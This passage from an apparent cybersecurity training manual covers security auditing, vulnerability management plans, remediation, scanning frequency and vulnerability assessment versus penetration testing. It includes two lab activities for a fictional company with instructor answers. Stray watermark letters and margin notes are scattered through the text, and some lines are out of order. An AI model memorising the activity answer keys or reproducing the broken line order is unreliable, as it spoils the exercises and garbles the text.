• ISO/IEC 27001, which has requirements for
information assurance that organizations may
choose to seek certification for. Certification is
performed by third parties, not by ISO itself.
e
• COBIT, which has requirements for IT
management and governance that organizations may
at
choose to seek certification for. ISACA performs its

own certification for COBIT.
lic
• PCI DSS, which is not legally binding.

Insurance More and more companies are taking out cybersecurity
insurance policies to transfer some or most of the
up
organization's risk onto a third party. These third-party

insurance providers usually require that the insuree is
meeting some baseline level of cybersecurity protection.
D
An insurer might define its own requirements, but

more commonly they will expect the insuree to comply
with industry standards like ISO/IEC 27001 and
ot
COBIT.
Asset Identification
N
One of the most crucial aspects of any audit is identifying assets subjected to the audit. If you Asset Identification
o
developed a useful set of audit objectives, you should be able to more effectively perform asset
identification. For example, if one of your objectives is to identify flaws in network intrusion
D
detection systems, it logically follows that any hardware or software systems that implement network
intrusion detection will be assets to cover in the audit.
An organization that's adequately prepared for an audit will plan ahead and inventory their assets,
like a database that contains the serial numbers of all laptops provisioned to employees. This makes
asset identification much easier, as everything you need will already have been documented,
including "where" those assets are (i.e., either physically or logically on the network).

You won't always be so lucky, however. If assets are not thoroughly documented beforehand, you
may need to scan the network for relevant hosts, or actually look for those hosts on the premises.
Also, some assets are not fixed objects that you can necessarily "find," but rather abstractions that
are nonetheless crucial to the audit. For example, the structure of the network can reveal a great deal
about your organization's security posture, but you may need to map that structure yourself using a
tool like Nmap.
There are so many potential types of assets there's not much point in listing examples. Basically,
anything that implements security, is affected by security systems, can be targeted by an attack, or
that has any kind of value to the organization, should be considered an asset as part of audit. Asset
e
identification can seem like an arduous process, especially in large organizations, but there are plenty
ut
of asset management platforms that can help automate and streamline the process. Also keep in
mind that focused audits (e.g., audits assessing compliance to only one specific policy) may not
require the organization's entire set of assets, just a small subset.
ib
Audit Results Documentation
tr
Audit Results The final phase of the audit process is to communicate the results you've been documenting as you
Documentation go through the audit. Most auditors have checklists on hand that they refer back to throughout the
is
process. The checklist might literally present questions that the auditor checks "Yes" or "No" to
(e.g., "Is remote access turned off for the Administrator account on the domain controller?"); it
D
might present a scenario the auditor has to score on a sliding scale (e.g., "From 1 to 5, how secure is
the customer records database from unauthorized access?"); it might ask open-ended questions with
spaces for open-ended answers (e.g., "Does the cloud vendor apply adequate encryption to all
network traffic?"); and so on.
or
Whatever form the documentation takes, you must ensure it records useful information and is
tailored to your unique objectives and assets.
e
at
lic
up
D
ot
N
Figure 6-2: An example of an audit checklist.

o
D
Audit Tools
Audit Tools Aside from manual auditing tasks like reviewing a checklist, there are also tools that can help
automate the auditing process. These tools, typically referred to as audit management solutions, have
several benefits as compared to manual auditing. They can:
• Save the auditor a great deal of time.
• Be more effective at gathering the required information.

• Increase the accuracy of an audit, eliminating errors, duplicates, and ambiguous data.
• Generate more robust documentation of audit findings.
• More easily integrate with a large number of target systems that have differing requirements.
Most robust audit management software includes components such as:
• A user interface.
• Compliance templates and checklists.
• Schedules with which to run auditing tasks at a chosen frequency.
• Automated suggestions in the event of non-compliance.
e
• Reporting capabilities, such as summarizing compliance levels through text and visuals.
ut
• Support for different documentation formats to enhance interoperability.
• Cloud synchronization so that audit information is centralized and easily accessible.
ib
tr
is
D
or
e
at
lic
up
Figure 6-3: An audit management software dashboard.
Examples of Auditing Tools

D
Some common examples of auditing tools include:

• ManageEngine ADAudit Plus—a proprietary suite for auditing all aspects of an Active Directory
ot
environment.
• Secureframe—a proprietary solution for auditing compliance using the System and Organization
Controls (SOC) type 2 framework for reporting. SOC was developed by the American Institute
N
of Certified Public Accountants (AICPA) and is used by CPAs to conduct independent audits
related to cybersecurity and privacy.
o
• Gensuite—a cloud-based proprietary solution for auditing against a wide range of standards and
regulations, including NIST 800-53, ISO/IEC 27001, PCI DSS, HIPAA, and more.
D
• Open-AudIT—an open source web-based solution for auditing system configurations across
Windows and Linux environments.
Audit Results Communication

Like any other process where you need to share your findings, you should make sure you're Audit Results
communicating with authorized audiences. When it comes to an internal audit, an auditor will Communication

typically share the results with their manager, the CISO, or another key decision maker in the
organization. The format of this communication can take several forms, including:
• A written report the audience can easily read on their own time.
• A slide presentation, which provides an opportunity to use visuals to communicate your
message, as well as an opportunity for your audience to ask questions in real time.
• An interactive website the audience can browse at their own pace.
None of these options are necessarily better than the others; it all comes down to your own comfort
level and available time, as well as how your audience prefers to receive the results.
e
Regardless of the format, there are some universal best practices to consider when drafting an audit
ut
report:
• Don't drown your audience in a sea of numbers. Adapt the presentation for different
audiences you must address, including only information relevant to that audience, avoiding
ib
jargon, and explaining things in a way the audience will understand.
• Avoid suspense. A good presentation flows well and tells a story, but not in the way a mystery
tr
novel tells a story. You will likely provide your audience with a lot of information to process, and
they will have questions and concerns. Help them understand and buy into your conclusions by
is
anticipating the types of questions you think they will have, and sharing important points early
on.
• Provide context for details. If you must tunnel down into details showing numbers, tables, and
D
charts, be sure to connect them back to the main idea or point you're trying to communicate.
• Be honest and transparent. Be clear regarding how you obtained results. Don't hide significant
data or results—even if they don't fully support your objectives or proposed solution.
contain errors. or
• Check your work. The quality of your findings may be called into question if your presentations
• Invite feedback. Make sure your audience has a chance to ask questions so you can provide
e
clarification and promote buy-in.
• Provide solutions, not just problems. Although an audit report should obviously mention gaps
at
in security and other compliance shortcomings, an audit is not helpful unless it also provides
suggestions for remediating these issues.
lic
Guidelines for Implementing Cybersecurity Auditing

up
Guidelines for
Implementing Note: All Guidelines for this lesson are available as checklists from the Checklist tile on the
Cybersecurity Auditing CHOICE Course screen.
D
Follow these guidelines when implementing cybersecurity auditing.
Implement Cybersecurity Auditing

ot
When implementing cybersecurity auditing:

• Follow a repeatable process for auditing—define objectives, prepare, conduct, and finalize the
N
audit.
• Conduct an internal audit at least annually, preferably semi-annually.
• Identify and consult various cybersecurity policies and procedures in your organization during an
o
audit.
• Weigh various factors when determining the proper objectives of an audit, such as the
D
organization's size and business goals.

• Consider how you might need to work with an external auditor in a compliance audit.
• Consider how you might need to work with another organization if you're an independent
compliance auditor.
• Ensure you have an asset inventory system in place before conducting an audit.
• Document results using a customized checklist as you conduct the audit.

• Identify the authorized audience to communicate your audit findings to.

• Determine the proper format with which to present your audit findings.
• Keep in mind general best practices for presenting results to an audience.
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D

ACTIVITY 6-1
Conducting a Cybersecurity Audit
Data File
e
C:\CNX0013Data\Assessing the Organization's Security Posture\audit_form.zip
ut
Activity: Conducting a
Cybersecurity Audit Before You Begin
You will be using your Windows Server machine for this activity. The XAMPP web server should
ib
still be running.
Scenario
tr
Develetech is required to perform routine audits of its critical server infrastructure. As part of this
is
audit, you'll review some of the security settings on your Windows Server and the Active Directory
domain policies it enforces, and compare them to the organization's baseline security policy
requirements.
D
In addition to the logical security of the server, you'll also audit its physical security. The server is
located in a large server room near some offices. The only entrance to the server room is a door that
or
requires key card access. Each key card is assigned to an authorized administrator so entry into the
room can be controlled and logged. The lighting in the room is always on so that administrators
don't have to remember to turn the lights on and off when they enter and exit. The server itself sits
on a shelf so that it can be easily moved to make room for new equipment.
e
To conduct the audit, you'll fill out a simple form that will help you keep track of successes and
at
failures in the audit. When you're done with the audit, you'll present your findings to management so
any problems you identified can be fixed.
lic
Be prepared to help
students answer the
audit questions. 1. Set up the audit form page on the server and navigate to it.
up
a) From the data files, right-click audit_form.zip and select Extract All.
b) In the Files will be extracted to this folder text box, type C:\xampp\htdocs
c) Select Extract and replace all files when prompted.
d) Open a new web browser tab and navigate to http://localhost:80/audit.php.
D
e) Verify that you are on the Windows Server Audit Checklist page.
ot
N
o
D
2. Fill out the Domain Password Policy section of the form.

a) Read each question.
e
b) Open a PowerShell window and enter Get-ADDefaultDomainPasswordPolicy
ut
c) Examine the results.
ib
tr
is
D
or
e
d) Using the results, select either Yes or No to answer each question.
at
e) When you're done, close PowerShell.
3. Fill out the Local Security Policy section of the form.

lic

up
D
ot
b) From Server Manager, select Tools→Local Security Policy.

N
o
D

c) In the Local Security Policy window, from the console tree, select Security Settings→Local
Policies→Security Options.
e
ut
ib
tr
is
D
or
e
d) Using the list of policies, select either Yes or No to answer each question.
at
The relevant policies are, respectively:

• Accounts: Block Microsoft accounts
lic
• Accounts: Guest account status

• Devices: Prevent users from installing printer drivers
• Shutdown: Allow system to be shut down without having to log on
• User Account Control: Detect application installations and prompt for elevation
up
e) Close the Local Security Policy window when you're done.
4. Fill out the Physical Security section of the form.

D

ot
N
o
D
b) Use the activity scenario to determine the answers to the audit questions.
c) Select either Yes or No to answer each question.
5. Obtain the results of the audit.

a) Select Submit.
b) Verify the number of audit successes and failures.

c) Verify the final audit score.
e
ut
ib
6. What are some of the audit failures you encountered?
tr
A: The server should have failed the following audit questions: 1.1, 1.2, 1.3, 2.1, 3.4, and 3.5. Most of
the failures center on the domain password policy and the server's physical security, with one
is
failure in the local security policy.
7. How might you communicate these audit results to a manager or other
D
decision maker?
A: Answers may vary, but you can tell your audience the server is failing to meet the password
or
requirements set out by company policy, and that these issues should be corrected in the domain
policy and then pushed out across the domain. You can also suggest that Microsoft accounts be
explicitly prevented from logging on to the server to correct the one local security policy failure.
From a physical security standpoint, although being able to move the server around is more
convenient, the administrators should securely fasten the server to the shelf or some other surface
e
to prevent it from being carried out. If they need to make room for new equipment, they should
at
better plan where to place existing equipment and the new equipment. Lastly, you should suggest
that the company install automatic lights so the lights turn on when administrators enter the room
and turn off when they exit. That way, passersby can't see into the room when no one's around.
lic
8. Close the browser.

up
D
ot
N
o
D

TOPIC B
Implement a Vulnerability Management Plan
Before you start evaluating your organization for flaws, you need to formulate a plan. This will
ensure that you're well-prepared to manage vulnerabilities, no matter the circumstances.
e
Vulnerability Management
ut
Vulnerability The methodical process of discovering, analyzing, and controlling every vulnerability associated with
Management unacceptable risks is called vulnerability management.
ib
Certain vulnerabilities related to your organization's information systems put your organization at
risk for various compliance- and security-related issues. Through your risk management processes,
tr
you can identify some security- and compliance-related risks that you can accept or transfer, and
others that you need to reduce or avoid.
is
By thoroughly examining your systems through vulnerability assessments and penetration testing,
you can identify sources of vulnerability to those risks that you need to reduce or avoid. This
D
essentially produces a to-do list of flaws in your systems you need to remediate. Identifying and
implementing specific corrections for each vulnerability enables you to harden your systems to
reduce or avoid your organization's risk. Once you have implemented a defensive system
or
configuration, you should also continually monitor, test, and adjust it to ensure the necessary
configuration continues to remain in place and continues to be effective over time.
The Vulnerability Management Process

e
at
The Vulnerability There are several general steps in the vulnerability management process.
Management Process
Step Description
lic
1. Inventory Identify all systems that exist within the area you plan to manage. Identify
and document the operating system platforms and functions associated
with each system, and identify any unauthorized or unmanaged systems.
up
2. Identify Identify any organizational, regulatory, or legal compliance requirements

requirements your systems are subject to.
D
3. Identify and assess Ensure that you and your assessment tools are approved to scan the
vulnerabilities and systems and information you've identified. Use vulnerability scanners and
exposures other tools to identify vulnerabilities and other ways your systems may be
ot
exposed to security issues.

4. Report on results Generate reports from vulnerability assessments and deliver these reports
N
to the appropriate stakeholders.

5. Remediate Apply corrective measures for any vulnerabilities that represent
unacceptable risks, guided by your current risk management criteria for
o
security and compliance. Assess vulnerabilities again to verify you have

corrected them as intended.
D
6. Implement Create a program for continuously monitoring assets for vulnerability

continuous monitoring information.
Note: Steps 5 and 6 are sometimes referred to as "post-assessment" tasks, as they are conducted
after the assessment proper.
Lesson 6: Assessing the Organization's Security Posture | Topic B

Requirements Identification
Before you can generate a baseline of acceptable configurations and behavior for your systems, Requirements
you'll likely have several different requirements these systems need to meet. These requirements can Identification
come from within the organization or from without—in either case, you need to identify exactly
what risks your systems must avoid to fulfill these requirements. Once you've identified these
requirements, you can conduct your vulnerability management tasks with them in mind, so your
management program accounts for the most crucial vulnerabilities and provides the most efficient
response if vulnerabilities are discovered.
e
Requirements come from a variety of sources, including:
ut
• Asset inventory: You don't just inventory your assets to know what to assess, you also do so to
identify how to assess them. This is because not all assets are of equal importance to the
organization, nor does each asset present the same level of underlying risk. You may choose to
ib
define assets in terms of being critical or non-critical to the survival of the business; the former
will likely require more scrutiny than the latter. The nature of an asset will also determine the
tools you use to detect and manage its vulnerabilities.
tr
• Regulatory environments: Your organization is likely subject to several technical regulations,
which vary by industry and by the nature of the organization's business operations. These
is
regulations often concern what types of data you can store, and how you must protect that data
from unauthorized access. Your vulnerability management plan needs to incorporate external
D
compliance requirements into its baseline so the network and systems in the organization are not
bringing about the risk of legal action.
• Corporate policy: To secure the business against risk, your organization will most likely have
or
one or more policies that dictate its expectations, like an acceptable use policy. These policies are
a necessary reference in any vulnerability management program, because security personnel
cannot assess and remediate vulnerabilities unless they know what risks the organization is
willing to accept, and what risks it is not. What's more, the vulnerability management program
e
must operate within time and budget constraints, both of which are affected by policy
at
requirements.
• Data classification: This is a major component of many corporate policies, as it enables the
organization to correctly assess the business value of the information it stores and transmits.
lic
Similar to taking inventory of physical assets, classifying data as sensitive versus non-sensitive
helps the vulnerability management program determine how vulnerabilities in data handling
should be identified and remediated.
up
Execution and Report Generation

D
The part of your vulnerability management plan that deals with executing scans and other Execution and Report
assessments should answer various questions, including: Generation
• Who will conduct the scan(s)?
ot
• When will the assessor conduct the scan(s)?

• What systems will the assessor scan?
N
• What impact will these scan(s) have on these systems?

• Do these systems need to be isolated during the scan(s), or can the systems remain in
production?
o
• Who can the assessor contact if they need assistance?

D
The majority of scanning tools will generate a summary report of all vulnerabilities discovered
during the scan directly after execution completes. These reports tend to color-code vulnerabilities
in terms of their criticality, with red typically denoting a weakness that requires immediate attention.
Other tools assign scores to each vulnerability using their own metrics or using other industry-
recognized metrics. Useful reports also go into specific detail about different categories of
vulnerabilities and how the scanned system does or does not exhibit flaws with regard to these
categories.

You can typically save reports to a file for easy distribution to the relevant audiences. Some tools can
be configured to distribute reports automatically to a set of predefined email addresses. You may
want to opt to distribute reports manually if the results require you to carefully explain important
context during a meeting with stakeholders, lest the results be misinterpreted. This can also prevent
sensitive vulnerability information from being sent to the wrong people.
e
ut
ib
tr
is
D
Figure 6-4: Part of a post-scan report. or
e
Plans of Action
at
Plans of Action In both vulnerability management and auditing, it's a good idea to have a plan in place for
addressing issues found during the assessment. This will ensure that you aren't scrambling to figure
lic
out what to do in an emergency. As you develop a plan of action, consider the following key
components:
• Review the assessment results. The plan of action should guide how regularly you review the
up
results, as well as stipulate what special circumstances warrant an immediate review.

• Focus on critical issues requiring action. During the review, you should triage any issues you
find, focusing on the ones most critical to the organization. The actions you apply to critical
issues will take priority.
D
• Identify appropriate remediation actions. Obviously, you need to figure out what the best
courses of action are to address the issues you discovered. It's not feasible to apply every possible
ot
fix to every issue, so you'll likely need to conduct a cost–benefit analysis to determine the most
appropriate fixes.
• Specify success criteria. The plan should define what success means as far as taking action to
N
address issues. For example, does success mean the risk of a vulnerability is mitigated entirely or
is avoiding the risk enough?
• Determine monitoring procedures. The plan also needs to account for how to monitor any
o
remediation actions you take to ensure they are working as intended. You might soon follow up
with another assessment to see if the vulnerability is still present, for example.
D
POA&M
The DoD supports a similar concept known as a plan of action and milestones (POA&M). As
defined in NIST SP 800-37r2, POA&M is about identifying risk mitigation tasks and the resources
needed to accomplish those tasks. It also outlines milestones in meeting these tasks, as well as
schedules for those milestones. Likewise, the POA&M anticipates any risk mitigation tasks that

cannot be implemented immediately due to several factors, such as the necessary resources for the
task being unavailable.
Remediation
Reports generated by a vulnerability assessment may offer suggestions as to how to fix any detected Remediation
security issues. Even if they don't, you'll likely need to put any vulnerabilities through the process of
remediation. Remediation is not just a simple process of applying a quick fix; it's a comprehensive
approach to managing the risk that vulnerabilities present to the organization. Ultimately, the goal of
e
remediation is to move the organization as close as possible to reaching a level of acceptable risk for
ut
a given situation.
One of the most important preliminary steps in the remediation process is to prioritize your efforts.
There are several factors that can affect which problems you choose to tackle and in what order,
ib
including how critical the affected system or information is, and how difficult it is to implement the
remediation. Having a plan for prioritization will enable you to focus on the most important targets,
tr
and consequently reduce risk as much as possible.
Other than prioritization, another important step in the remediation process is planning for change
is
control implementation. A change control system may already be in place to manage how changes
are applied, whether security related or otherwise. You need to ensure you communicate your
remediation efforts with personnel who oversee change control so the process goes smoothly. In
D
some cases, you may need to demonstrate your suggested changes will have a minimal impact on
operations and will actually fix what they claim to. By conducting sandbox tests on your suggested
changes, the organization can be more confident about pushing this remediation to production
systems.
Validation
or
e
After you've implemented your remediation techniques, you need a way to validate the intended
actions were taken and had the intended effect. Regular audits you or an external party conducts will
at
typically catch any gaps in your remediation. However, it may be too late by the time this happens,
and any issues with your remediation efforts may go undetected and uncorrected for longer than
lic
you can tolerate. That's why you should consider incorporating a validation phase at the end of your
remediation process—so you can quickly guarantee a particular vulnerability has been fixed and is
not continuing to bring risk to the organization.
up
Remediation Inhibitors
You should be aware there are plenty of inhibitors to the remediation process. These obstacles can Remediation Inhibitors
D
undermine your ability to deal with vulnerabilities in the most ideal way possible, and in some cases,
may make it impossible to remediate the problem. For example:
ot
• The suggested remediation method may lead to a necessary business process interruption. In
some cases, this type of interruption is deemed too much of a risk to the business's operations.
Or, the interruption is at least enough of a risk that the remediation, if successful, is not worth
N
implementing.
• The remediation may lead to a degradation of functionality in a particular component. This is
often the case with systems flawed by design—those that failed to incorporate security as a
o
fundamental element of the design process. These systems may not be able to operate as desired
if security restrictions are placed on them.
D
• Organizational governance may make it difficult for security personnel to implement remediation
if higher-level decision makers do not sign off on the fixes. They may not understand the
importance of remediating the affected component or they may decide that the suggested
remediation is not worth the time and expense.
• The suggested remediation may be too resource intensive, or may require resources beyond the
organization's reach. There are many other resource-related implications brought about by your

remediation efforts that you need to identify, though you won't always be able to overcome these
challenges.
• Business documents like memoranda of understanding (MOU) and service-level agreements
(SLA) can limit the security team's ability to remediate vulnerabilities. General consumers and
business customers expect a certain level of functionality in the products they purchase, and if
the organization implements a fix that negatively impacts this functionality, the organization
could be in violation of an SLA, MOU, or other such agreement.
Vulnerability Management Documentation
e
ut
Vulnerability Each step of the vulnerability management process, as well as the findings and outcomes that come
Management from each step, should be documented. This means recording each asset identified as part of the
Documentation inventory process; recording any vulnerabilities that are found; recording remediation techniques,
ib
and so on. All of these things must be documented during each relevant step, not later or at the very
end of the process. That way, you can ensure you don't miss or forget to document some important
aspect of the environments under review.
tr
In addition to documenting remediation techniques, you should also be prepared to document
is
exceptions. In some cases, an assessment may reveal a vulnerability that, for various reasons (like
those mentioned previously), you've decided not to remediate. For example, you might have a legacy
system that cannot function without some service that, on modern systems, would bring about
D
unacceptable risk. By documenting exceptions like these, you ensure that your remediation efforts
don't end up causing more problems than they solve.
or
To keep sensitive information from falling into unauthorized hands, you must take care to secure
your documentation at all times. This means not storing a digital form of the documentation on a
public repository or a private network share that is exposed to all personnel in an organization. In
some cases, you may want to encrypt the documentation and implement digital signatures to uphold
e
its confidentiality and integrity.
at
Ongoing Scanning
lic
Ongoing Scanning Vulnerability management is not a linear process, but a cyclical one. The ever-changing threat and
technological landscape enables attackers to develop novel ways of compromising an organization.
That's why your vulnerability management program needs to conduct regular, ongoing scans as part
up
of the organization's wider continuous monitoring efforts.

Ideally, you'd be able to scan as often as you want, but the security team is not allocated infinite time
and resources, and it may be under certain technical constraints. Additionally, you need to consider
the possibility certain scans will disrupt the services hardware and software systems provide.
D
Whereas some techniques have a negligible impact on performance, others may add significant
overhead to computing and network resources.
ot
Scanning Frequency
N
Scanning Frequency You need to consider multiple factors when it comes to choosing a scanning frequency. Just like
with requirements identification, the laws and regulations your organization is subject to may be
critical drivers. Some sources of external compliance may outright dictate a scanning frequency that
o
your organization must follow; others take a more hands-off approach and simply require that you
have a plan in place to scan at certain intervals. Likewise, your scanning frequency will depend on
D
internal risk-based compliance. If you determine you have a large risk appetite for a certain system
or function of the business, you may choose to scan less frequently, and vice versa.
Your workflow may be another factor that affects your scanning frequency. For example, running a
simple port scan on a small number of hosts in your environment may take just a few minutes and
won't be too taxing—therefore, you may want to run such a scan at least once a day, preferably
when the hosts are not being used during business hours. On the other hand, a deep and thorough

vulnerability scan of all hardware and software objects could take several hours and be a drain on
resources, so you may want to run this scan once a week or once a month on the weekends.
Another driver of scanning frequency is the rate at which changes are made to the systems within
the assessment scope. If a system is patched or reconfigured often, the standard scanning frequency
may not be sufficient. You may need to scan said systems more often to keep up with the rate at
which vulnerabilities accumulate.
Guidelines for Implementing a Vulnerability Management Plan
e
Use the following guidelines when implementing a vulnerability management plan. Guidelines for
ut
Implementing a
Implement a Vulnerability Management Plan Vulnerability
Management Plan
ib
When implementing a vulnerability management plan:
• Take inventory of all assets in the organization, including both hardware and software assets.
• Consider how regulatory requirements may drive your vulnerability assessments.
tr
• Consider how policies, like data classification, may inform what assets you assess and how you
assess them.
is
• Ensure that you can answer various questions about assessment execution, such as who will carry
out the assessment and when.
D
• Ensure that your assessment tools are generating actionable reports.
• Consider how you will distribute these reports to the proper stakeholders.
or
• Establish a remediation process for addressing vulnerabilities found during assessments.
• Prioritize remediation efforts to tackle the most critical vulnerabilities or assets.
• Plan remediation efforts around change control processes.
• Consider there are several factors that could inhibit your remediation efforts, like the risk of
e
service interruption.
at
• Document each step of the vulnerability management process as it occurs.

• Incorporate ongoing scanning into your continuous monitoring program.
• Establish a frequency for ongoing scans based on ease of implementation and how the scans fit
lic
into your employees' workflow.

up
D
ot
N
o
D

ACTIVITY 6-2
Implementing a Vulnerability Management Plan
Activity: Implementing a
Vulnerability Before You Begin
e
Management Plan
You'll use your Windows 10 computer in this activity.
ut
Scenario
Up until now, Develetech has been addressing vulnerabilities reactively—every time a major security
ib
alert is issued by an external source, the organization scans a few of its systems for flaws. However,
you know this kind of approach is not sufficient if the organization wants to truly mitigate risk. You
tr
suggest that your team develop a comprehensive vulnerability management plan so that Develetech
is more proactive about fixing its security issues.
is
® ®
1. On your Microsoft Windows 10 computer, open a web browser and
D
navigate to https://www.pcisecuritystandards.org/documents/
PCI_DSS_v3-2-1.pdf.
or
Note: If you're redirected to the document library, select the PCI DSS link and
accept the licensing agreement. Select the link again, and if you're prompted to
fill out a form, select No Thanks.
e
Navigate to page 96 ("Requirement 11: Regularly test security systems and
at
2.
processes").
lic
3. This section of the PCI DSS outlines requirements for vulnerability scans.
According to these requirements, what are some of the behaviors that
up
Develetech must incorporate into its vulnerability management program?

A: Answers may vary, as there are several requirements that PCI DSS outlines for the organization.
Some examples include: the organization must scan for all wireless access points (WAPs) in its
D
environments at least once every three months; the organization must run a vulnerability scan
after a significant change to its network (e.g., its topology changes); the organization must allow
an external vulnerability assessment agency validated by PCI DSS to scan environments every
ot
three months; the organization must have a monitoring process in place for detecting changes to
critical files; and more.
N
o
D

4. Develetech has a small division within the company that provides cloud-based
virtual server usage to customers in an Infrastructure as a Service (IaaS)
platform. Develetech signs off on an SLA for each customer, promising that it
will deliver 99.99% uptime with limited latency. In order to keep these virtual
systems secure, you run vulnerability assessments on them periodically. The
latest scan reveals a major vulnerability that will require a quick security patch
to fix.
e
How could the nature of this cloud platform business inhibit Develetech from
remediating this problem?
ut
A: Answers may vary, but Develetech needs to consider the impact of putting the security patch in
place. If the company simply propagates the fix to all production environments at once, there will
ib
likely be processing and networking bottlenecks that cause delays or may even lead to a
disruption of service. If this is in direct violation of the SLA, Develetech may be subject to legal
action. The vulnerability management plan needs to account for the impacts of remediation with
tr
regard to the company's various business arrangements.
is
5. You want to run a thorough and comprehensive vulnerability scan of all critical
production systems once a week, and a quicker port scan of those same
D
systems every other day.
What factors influence your decision to conduct these two scans at different
frequencies?
or
A: Answers may vary. The comprehensive vulnerability scan is likely to be a bigger drain on network
and computing resources, so it wouldn't necessarily be feasible to conduct this scan every day.
On the other hand, the port scan is less disruptive, so it makes more sense to conduct it more
e
frequently. Time is also a factor—the comprehensive scan could take several hours, or even days,
at
while the port scan may take just a few minutes. Another factor to consider is employee workflow.
Starting the comprehensive scan in the middle of a weekday is not the best choice, as the chance
of interrupting business is at its highest. Performing either scan after business hours or on the
lic
weekend is usually the best approach.

up
D
ot
N
o
D

TOPIC C
Assess Vulnerabilities
Now that you've established a plan for managing vulnerabilities, you can start assessing those
vulnerabilities directly.
e
Vulnerability Assessment
ut
Vulnerability A vulnerability assessment is an evaluation of a system's security and ability to meet compliance
Assessment requirements based on the configuration state of the system, as represented by information collected
ib
from the system.
Essentially, the vulnerability assessment determines if the current configuration matches the ideal
tr
configuration. Before beginning the assessment process in earnest, you should first establish the
scope of the assessment so that it supports your compliance requirements without exceeding them.
is
The process consists of the following steps:
1. Collect a predetermined set of target attributes (such as specific parameters or rules for a
D
firewall).
2. Store the collected sample for reference.
3. Organize the data to prepare it for analysis and comparison.
5. Report on the results. or

4. Analyze and document the differences between the current configuration and the baseline.
Although this process could be conducted manually, vulnerability assessments are typically
e
accomplished through automated vulnerability assessment tools, which examine an organization's
systems, applications, and devices to determine their current state of operation and the effectiveness
at
of any security controls. Typical results from a vulnerability assessment will identify
misconfigurations and missing security patches or critical updates.
lic
Perform vulnerability assessments when:

• You first deploy new or updated systems, which provides a baseline of the systems' security
configurations.
up
• New vulnerabilities have been identified through penetration tests, or based on general
information from vendors, a vulnerabilities database, or other sources. A vulnerability assessment
can reveal systems that are subject to the vulnerabilities and where you need to focus your
remediation efforts.
D
• A security breach occurs, as the vulnerability assessment can help you identify possible attack
vectors and determine whether they have been exploited.
ot
• You need to document the security state of systems. For example, you may be required to
do this to satisfy a regulatory audit or other oversight requirements.
N
Penetration Testing
A penetration test, or pen test, uses active tools and security utilities to evaluate security by
o
Penetration Testing
Penetration testing is executing an authorized attack on a system. A penetration test will verify a threat exists, then it will
D
introduced here so actively test and bypass security controls, and finally it will exploit vulnerabilities on the system. Such
students understand vulnerabilities may be the result of poorly or improperly configured systems, known or unknown
how vulnerability hardware or software flaws, or operational weaknesses in processes or technical countermeasures.
assessments are Any security issues found in the test that can be exploited are presented to the organization with an
different. assessment of the impact and a remediation proposal.
Penetration tests are less common and more intrusive than basic vulnerability assessments.
Penetration tests tend to be driven by an organization's desire to determine the feasibility of an
Lesson 6: Assessing the Organization's Security Posture | Topic C

attack and the amount of business impact a successful exploitation of vulnerabilities will have on an
organization. One major difference between penetration testing and typical vulnerability assessments
is that the rating assigned to a vulnerability during a vulnerability assessment is subjective, whereas a
penetration test will exploit a real vulnerability to test it. Penetration testing also tends to combine
multiple vulnerabilities together to provide a more holistic understanding of an organization's
vulnerability state.
It is important that penetration testing follows a method similar to what a real attacker would use, Consider asking
including phases in which the attacker prepares and learns what they can about the target. The students if they have any
experience with a
difference between the execution of a real attack and a penetration test is that of intent, and you
e
penetration test causing
should have the explicit permission of the target organization before you begin the test. You should real-world damage.
ut
make sure the organization is aware the test should not stop until the attack has been fully carried
out. Otherwise, the results of the test could be skewed or the live systems themselves may be
damaged.
ib
Vulnerability Assessment vs. Penetration Testing
tr
Vulnerability assessment and penetration testing are related in that both are used to assess systems in Vulnerability
light of the organization's security posture, but they have different purposes. Unfortunately, the Assessment vs.
is
terms are often confused. For example, you may hear someone use the term "penetration test" to Penetration Testing
describe a vulnerability assessment. In any conversation where the distinction matters, you might ask
D
the person to clarify what they mean.
The following table compares a vulnerability assessment with a penetration test.
Attribute of the
Process
Focus
Vulnerability
Assessment
Specific known
or
Penetration Testing
• Specific known technical vulnerabilities.

e
technical • Multiple known technical vulnerabilities
at
vulnerabilities. (stacked, in combination).

• Unknown technical vulnerabilities.
• Non-technical vulnerabilities, such as social
lic
engineering and physical controls.

Degree of human Largely automated, Largely manual, supplemented with automated
up
control using scanning tools. tools, but driven in part by human intuition,
which is difficult to simulate or automate.
Disruption to system Minimal, since most of Potentially significant, since exploits such as
D
operations the focus is on data distributed denial of service (DDoS) attacks may
collection. be conducted.
Frequency and Performed frequently Expensive, time consuming, and potentially
ot
duration and monitored on an disruptive, so not performed on a frequent basis.

ongoing basis.
N
Personnel who Typically internal Internal or external; often a combination of

perform it personnel. both.
o
Cost Typically a minimal Typically a larger cost on an individual basis.

ongoing cost based on
D
frequent scans.
Vulnerability Assessment Implementation

To implement vulnerability assessment tools and techniques: Vulnerability
Assessment
Implementation

1. Install the assessment software on the systems per the implementation plan. If necessary, run
suitable patches to ensure the latest version of the tool is implemented.
2. Study the assessment software's help manual. Enable options that will keep the software
automatically updated. Register the software to receive its full benefits.
3. Perform an initial assessment of the system.
4. Save the initial assessment results as the baseline.
5. Analyze the assessment reports.
6. Take suitable corrective actions based on the reported findings.
e
7. Perform the assessment again.
8. Save the results and compare them with the baseline assessment results.
ut
9. Document your findings and prepare suitable reports to present to upper management.
10. Perform ongoing assessments on all systems in your organization.
ib
Tools Used in Vulnerability Assessment
tr
Tools Used in Many software tools support vulnerability assessments. You can find tools to detect a wide range of
Vulnerability vulnerabilities and specific hard-to-detect vulnerabilities. By running these tools, you can see exactly
is
Assessment (2 Slides) what potential attackers would see if they assessed your systems. However, their usefulness to you is
dependent on how well you can interpret the results of security assessment tools. When you become
D
acquainted with what to expect and what to look out for in a tool's results, it will be easier for you to
remove any vulnerabilities in your system.
The following table lists some of the available vulnerability assessment tools.
Vulnerability
Assessment Tool
Description or
e
Vulnerability scanner Identifies and reports on known weaknesses found in devices,
applications, and systems residing on a network. A vulnerability scanner
at
can use a number of different assessment techniques to detect flaws, and

each scanner may target only specific technologies. Because they rely on a
lic
prior knowledge of vulnerabilities, these scanners may be ill equipped to

assess new and emerging weaknesses.
Port scanner A device or application that scans a network to identify what devices are
up
reachable (alive), what ports on these devices are active, and what
protocols these active ports use to communicate. A port scanner typically
relies on the most common network protocols (for example,
Transmission Control Protocol [TCP], User Datagram Protocol [UDP],
D
and Internet Control Message Protocol [ICMP]) to retrieve this

information. The port information revealed in a scan can help you
pinpoint vulnerabilities in your network, as attackers will often use open
ot
ports as an intrusion vector.

Protocol analyzer Decodes and analyzes the traffic sent over a network communication
N
session. By presenting the conversation to the end user in an easily

understood manner, this decode process simplifies the interpretation of
the protocols used in the traffic. Protocol analyzers are useful for
o
